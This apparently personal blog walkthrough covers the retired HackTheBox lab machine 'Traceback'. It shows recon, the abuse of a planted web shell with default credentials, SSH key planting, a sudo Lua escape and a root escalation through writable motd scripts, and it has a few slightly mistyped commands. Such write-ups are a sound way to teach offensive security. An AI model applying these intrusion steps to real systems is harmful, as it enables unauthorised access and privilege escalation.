This article is my guide for hacking traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully i'm doing this correctly.
I enjoyed this box. It was right at my skill level and took me about two hours to complete.
To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box.
sudo echo "10.10.10.181 >> /etc/hosts
nmap -A traceback.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT Nmap scan report for traceback.htb (10.10.10.181) Host is up (0.061s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
Pretty simple scan. It looks like web and ssh are available.
Web site looks like this:
Viewing source on the website reveals this:
I decided to search google for that string:
It looks like we got a hit. I'm going to see if any of those shells are installed on this server, time for gobuster.
I took that list of shells from GitHub and dumped them into a text file called shells.txt. Let's see if we can find them on the server:
Now let's fire up gobuster:
We got a hit!
I loaded the page into the browser:
And this came up:
Looking at the source code of the original on GitHub, I can see a default login embedded in code.
Username: admin Password: admin
Let's try those.
...we are in. It looks like the current user is webadmin. After browsing around in the webadmin folder, I noticed that the /home/webadmin/.ssh folder is writable. We can upload an authorized_keys file with our key in it to gain access via ssh. Gaining ssh will be very helpful.
First, let's generate an ssh key:
Now let's copy the public key to authorized_keys:
cp traceback.pub authorized_keys
Now let's upload it via the form on the website:
Great, it took it. Now let's chmod the private key so we can use it.
chmod 600 traceback
Now let's ssh into the box:
ssh -I traceback firstname.lastname@example.org
We are in!
Let's see if there are any programs we can run as root:
Oh, this looks promising. I google luvit and found this:
Luvit looks like a Lua application. I went to gtfobins to see if I could exploit a Lua application.
And here is our strategy. First, I executed:
sudo -u sysadmin /home/sysadmin/luvit
The application prompted me to enter something. I typed in the command I got from gtfobins but used bash instead of sh:
Now I've got access to sysadmin and the first flag!
Now let's see if we can get root.
I downloaded linpeas.sh from here.
I tried to get it directly on the box, but that didn't work.
I'm going to download it to my local box and use python's built-in http server to upload it. I'm executing this in the same folder that linpeas.sh is in.
python -m SimpleHTTPServer
Now I can access it from the remote by calling:
Let's make it executable:
chmod +x linpeas.sh
Now let's run linpeas.sh
Scrolling through the output, I noticed this:
00-header seems to be the header message when you log in:
I decided to see if I could run "id" from that shell when I log in as webadmin. The command would tell me what priv's are being executed when that script is run.
echo "id" >> /etc/update-motd.d/00-header
When I log in, it should print out what user is executing that file. Hopefully root.
Boom root! Ok, let's exploit that. We know that the root flag is always /root/root.txt.
echo "cat /root/root.txt" >> /etc/update-motd.d/00-header
Now let's log in again.
And you can see the root flag printed:
We are all done! We could've easily used that exploit to gain actual root on the box, but all I needed for this activity was the root flag. This box was fun! I highly recommend it.